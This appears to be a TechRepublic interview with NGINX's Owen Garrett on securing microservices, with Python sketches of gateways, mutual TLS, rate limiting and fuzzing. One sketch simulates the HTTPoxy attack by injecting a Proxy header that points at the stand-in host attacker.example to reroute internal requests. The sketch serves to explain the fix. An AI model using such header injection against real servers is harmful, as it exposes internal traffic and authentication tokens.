I find the topic of microservices fascinating, so I wrote earlier this month about the concept of microservices and how to secure them. In a nutshell, microservices are application building blocks, each of which usually performs one specific function. What’s interesting about them is how they can be bolted together, almost like Frankenstein’s monster (but with better stability), to help standardize code, reduce complexity, and add scalability and flexibility to the application development and maintenance process.
There are noteworthy considerations here involving the cloud, the differences from standard applications, and security. I spoke with Owen Garrett, Head of Products at NGINX, to learn more about the topic.
TechRepublic: Are microservices a cloud phenomenon, in-house, or hybrid?
Owen Garrett: “You can deploy microservices anywhere: on-premises, in the public cloud, or hybrid. The early adopters are mostly cloud-based (Netflix, for example), but as enterprises adopt microservices, a good portion will be running them out of their private data centers.
The microservices approach to application architecture arose partly in response to the need to build “Cloud-Native Applications”. The cloud-native pattern requires a decoupled application architecture that is distributed, scalable and fault-tolerant, and microservices meet these requirements perfectly. That said, there’s nothing in the microservices approach that limits them to the cloud.
Microservices applications are composed of clusters of small (‘micro’) applications (‘services’) that communicate across a network. These small applications are typically packaged using containers, so they generally require a platform that can deploy containers rapidly and efficiently, and which provides the advanced networking services (discovery and load balancing) necessary to support them. Some cloud providers do provide specialized container hosting services, but it’s more common for enterprises to deploy Kubernetes, Docker or Mesos platforms themselves. These platforms can be deployed almost anywhere, from a single developer’s laptop to a thousand-server on-premises or cloud data center.”
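The discovery and load-balancing services Garrett mentions can be sketched in miniature. The registry and round-robin classes below are hypothetical illustrations, not any particular platform’s API: services register their instance addresses, and a balancer spreads calls across them.

```python
from itertools import cycle

class ServiceRegistry:
    """Toy service registry: maps service names to live instance addresses."""
    def __init__(self):
        self._instances = {}

    def register(self, service, address):
        self._instances.setdefault(service, []).append(address)

    def instances(self, service):
        return list(self._instances.get(service, []))

class RoundRobinBalancer:
    """Distributes calls across a service's registered instances in turn."""
    def __init__(self, registry, service):
        self._cycle = cycle(registry.instances(service))

    def next_instance(self):
        return next(self._cycle)

# Two instances of a hypothetical "payments" service register themselves:
registry = ServiceRegistry()
registry.register("payments", "10.0.0.1:8080")
registry.register("payments", "10.0.0.2:8080")

balancer = RoundRobinBalancer(registry, "payments")
picks = [balancer.next_instance() for _ in range(4)]
```

Real platforms such as Kubernetes provide the same two primitives (a registry via DNS/endpoints, and a balancer via its Service abstraction), but with health checks and dynamic membership layered on top.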
TR: Can you elaborate on how microservices are different from legacy applications?
OG: “There is a larger attack surface involved. Each client directly accesses a different subset of APIs and web endpoints. This distributed nature means that many more components are potential intrusion points and need to be secured, yet it’s harder for an organization to consistently apply security best practices across all of those components. Once one is breached, you should assume it can be used as a beachhead to access all of the data that the compound application uses, and the effects may ripple through to other applications that share some of the same services.”
TR: What are some concrete examples of security risks involving microservices?
OG: “Microservices applications rely heavily on the network for inbound traffic (north-south) and for internal inter-service traffic (east-west). The need to secure east-west traffic is new, and one cannot assume that even a single-tenant environment is secure. Anyone who has unauthorized visibility of network traffic – another tenant, or even another microservice – can potentially view or modify sensitive transactions.”
TR: Have any of these risks been exploited or leveraged in the real world?
OG: “Passively monitoring traffic in that way is very commonplace. Leaked documents show that the NSA and other government organizations have monitored and cataloged communications between Google data centers, for example. In response, Google began encrypting this traffic, much as advocated above.
Though this sort of attack is not specific to microservices, the amount of additional “east-west” network traffic introduced by microservices does make them more susceptible.
Any means that an attacker can use to get access to one component, and then to map out the broader architecture of the application, can be exploited to compromise an application. For example, the HTTPoxy vulnerability that was disclosed in 2016 provided a way to re-route internally-generated requests to a server of the attacker’s choice, allowing an attacker to gain intelligence on the internal architecture and to potentially capture authentication tokens and other sensitive information.
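HTTPoxy is worth a closer look because the mechanism is so simple. The sketch below is a simplified simulation, not an exploit against any real server: CGI-style code maps each request header to an `HTTP_`-prefixed environment variable, so an attacker-supplied `Proxy` header becomes `HTTP_PROXY`, which many HTTP client libraries consult when making outbound requests.

```python
import os

def cgi_headers_to_env(headers):
    """CGI convention: each request header becomes HTTP_<NAME> in the
    environment. An attacker-supplied 'Proxy' header thus becomes HTTP_PROXY."""
    for name, value in headers.items():
        os.environ["HTTP_" + name.upper().replace("-", "_")] = value

def outbound_proxy():
    """Stand-in for an HTTP client library that honors HTTP_PROXY."""
    return os.environ.get("HTTP_PROXY")

# The attacker sends a request carrying a Proxy header...
cgi_headers_to_env({"Proxy": "http://attacker.example:8080"})
# ...and any internal request made while handling it is now routed
# through the attacker's server, exposing internal architecture and tokens.
rerouted_via = outbound_proxy()
```

The actual fix was for web servers and frameworks to refuse to translate the `Proxy` header into `HTTP_PROXY` at all.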
Poor API design can also be exploited to reveal internal information and even customer information. For example, reusing authentication or identifying tokens (or allowing an attacker to brute-force them) is bad practice and can be used to access internal data.”
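The point about guessable tokens can be illustrated with a short contrast (the token formats here are hypothetical, not from the interview): sequential identifiers let an attacker who sees one token enumerate its neighbors, while a token drawn from the operating system’s CSPRNG cannot be brute-forced in practice.

```python
import secrets

def weak_token(counter):
    """Sequential tokens: seeing one reveals the whole keyspace."""
    return f"user-{counter:06d}"

def strong_token():
    """128 bits of randomness from the OS CSPRNG: infeasible to enumerate."""
    return secrets.token_urlsafe(16)

# A leaked weak token immediately exposes its neighbors:
guessable = [weak_token(n) for n in (41, 42, 43)]
unguessable = strong_token()
```

The same reasoning applies to session identifiers, password-reset links, and any other bearer credential an API hands out.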
TR: What do you recommend for a reliable microservice security strategy?
OG: “Any organization that is exposing one or more APIs for external access should deploy some form of API gateway. This does not necessarily need to be a specialized device – for many use cases, organizations use an intelligent reverse proxy that allows them to inspect, authenticate, and rate-limit API requests, only admitting requests that meet appropriate criteria and logging all transactions. It almost goes without saying that all API traffic must be encrypted using TLS. API clients should be authenticated using both an application identifier (an API key or other shared secret) and a user identifier (an SSL certificate or OAuth token). Even anonymous API requests should be required to use a unique user identifier, in order to apply rate limits and to log traffic.
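The gateway’s admission logic – authenticate the application, then rate-limit per user – can be sketched as follows. This is a minimal in-memory illustration; the key set, limits, and function names are assumptions, and a production gateway (NGINX, for instance) does this in configuration rather than application code.

```python
import time
from collections import defaultdict, deque

VALID_API_KEYS = {"app-key-1"}      # application identifiers (shared secrets)
RATE_LIMIT = 5                      # max requests per user...
RATE_WINDOW = 60.0                  # ...per 60-second sliding window

_request_log = defaultdict(deque)   # user_id -> timestamps of recent requests

def admit(api_key, user_id, now=None):
    """Admit a request only if the app key is known and the user is under limit."""
    now = time.monotonic() if now is None else now
    if api_key not in VALID_API_KEYS:
        return False                            # unknown application: reject
    window = _request_log[user_id]
    while window and now - window[0] > RATE_WINDOW:
        window.popleft()                        # expire old timestamps
    if len(window) >= RATE_LIMIT:
        return False                            # per-user rate limit exceeded
    window.append(now)
    return True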
Using SSL internally for all traffic, authenticating and revoking all access using a PKI, and authenticating and inspecting incoming traffic using a reverse proxy goes a long way toward meeting the additional, unique needs of securing a microservices application.
In addition, the internal security of a microservices application should not be forgotten. It’s worthwhile to maintain a healthy degree of suspicion of the other components in the application; even if they can be completely trusted now, there’s no telling how the client base for the application will grow in the future.

A good first step is to quickly standardize on using TLS for all internal communications, and build certificate validation of both clients and servers into the architecture from the beginning. Although there is an obvious performance impact from doing so, accelerating proxies can offload and optimize these encrypted connections to minimize any impact.

One important benefit of using an internal PKI (public key infrastructure) is that you can assign client and server certificates to each consumer and server within the application. A central PKI makes it very easy for the operations team to revoke access to internal client or server components if they are compromised, or even if they are just retired and replaced by newer containers. Furthermore, a unique identity for the endpoint of each transaction is invaluable when logging and auditing transactions.”
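The mutual-TLS policy described above – every internal peer must present a certificate issued by the internal CA – maps directly onto Python’s standard `ssl` module. This is a sketch of the policy only; the certificate and CA file names in the comments are placeholders for whatever the internal PKI issues.

```python
import ssl

def harden_for_internal_mtls(ctx):
    """Apply the mutual-TLS policy to a context: modern TLS only, and every
    connecting peer must present a certificate we can verify."""
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED   # reject peers without a valid cert
    return ctx

server_ctx = harden_for_internal_mtls(ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER))

# In a real deployment each service would also load its own identity and
# restrict trust to the internal PKI's CA (file names are placeholders):
#   server_ctx.load_cert_chain("service.crt", "service.key")
#   server_ctx.load_verify_locations("internal-ca.crt")
```

Because trust is rooted in the internal CA alone, revoking a retired or compromised container is a PKI operation; no per-service configuration needs to change.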
TR: Do you recommend any other methods for securing microservices?
OG: “Deploy intrusion detection that identifies anomalous traffic and behavior (high error rates, frequent cycling of authentication credentials, malformed or repeated requests) so that bad actors can be identified and then blocked.
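One of the signals Garrett names – a high error rate – lends itself to a compact sketch. The thresholds and names below are illustrative assumptions; real intrusion detection combines many signals and far more history.

```python
from collections import defaultdict

ERROR_RATE_THRESHOLD = 0.5   # block clients whose error rate exceeds 50%...
MIN_REQUESTS = 10            # ...once enough traffic has been seen to judge

_stats = defaultdict(lambda: {"total": 0, "errors": 0})
_blocked = set()

def record(client, status_code):
    """Record one response; block the client if its error rate is anomalous."""
    s = _stats[client]
    s["total"] += 1
    if status_code >= 400:
        s["errors"] += 1
    if s["total"] >= MIN_REQUESTS and s["errors"] / s["total"] > ERROR_RATE_THRESHOLD:
        _blocked.add(client)

def is_blocked(client):
    return client in _blocked

# A hypothetical scanner probing for endpoints generates nothing but 404s,
# while a normal client's requests succeed:
for _ in range(10):
    record("vuln-scanner", 404)
for _ in range(10):
    record("healthy-client", 200)
```

The same bookkeeping extends naturally to the other signals mentioned: credential-cycling frequency or malformed-request counts per client.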
Employ a principle of least privilege for each component within the application – white-list access control, secret protection using revocable tokens, and PKI-based authentication and access control – with particular focus on APIs that can access sensitive data.
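Least privilege with revocable tokens can be sketched as a central token store that grants each token an explicit API white-list. The store, token name, and API paths below are hypothetical; in practice this role is played by an OAuth server or service mesh policy engine.

```python
# Hypothetical in-memory token store: each token carries an explicit
# white-list of APIs (least privilege) and can be revoked centrally.
_tokens = {}

def issue(token, allowed_apis):
    _tokens[token] = set(allowed_apis)

def revoke(token):
    _tokens.pop(token, None)

def authorize(token, api):
    """Allow only known tokens, and only for explicitly white-listed APIs."""
    return api in _tokens.get(token, set())

# A billing service is granted exactly the two APIs it needs, nothing more:
issue("billing-svc-token", {"/invoices", "/payments"})
ok = authorize("billing-svc-token", "/invoices")
forbidden = authorize("billing-svc-token", "/admin/users")

# Revocation is a single central operation, as with the PKI described earlier:
revoke("billing-svc-token")
after_revoke = authorize("billing-svc-token", "/invoices")
```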
And make sure to regularly use intrusion tools and request fuzzers (fuzzing finds code issues and security risks by feeding large quantities of random data – fuzz – to the system to see if it can be compromised or made to fail) in development and test, to identify issues before an attacker can find them.”
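A request fuzzer can be surprisingly small. The sketch below fuzzes a toy length-prefixed parser (both the parser and the fuzzer are illustrative, not a real tool): random byte strings are thrown at the parser, its documented rejection (`ValueError`) is tolerated, and anything else is recorded as a crash to triage.

```python
import random

def parse_length_prefixed(data):
    """Toy parser under test: reads a 1-byte length, then that many bytes."""
    if not data:
        raise ValueError("empty input")
    n = data[0]
    if len(data) - 1 < n:
        raise ValueError("truncated payload")
    return data[1:1 + n]

def fuzz(parser, rounds=1000, seed=0):
    """Feed random byte strings to the parser; collect unexpected failures.
    ValueError is the parser's documented rejection; anything else is a bug."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(rounds):
        blob = bytes(rng.randrange(256) for _ in range(rng.randrange(0, 32)))
        try:
            parser(blob)
        except ValueError:
            pass                        # expected rejection of malformed input
        except Exception as exc:        # unexpected failure: record for triage
            crashes.append((blob, exc))
    return crashes

crashes = fuzz(parse_length_prefixed)
```

Production fuzzers such as AFL or libFuzzer add coverage guidance and corpus mutation, but the test oracle – “did anything other than a clean rejection happen?” – is the same.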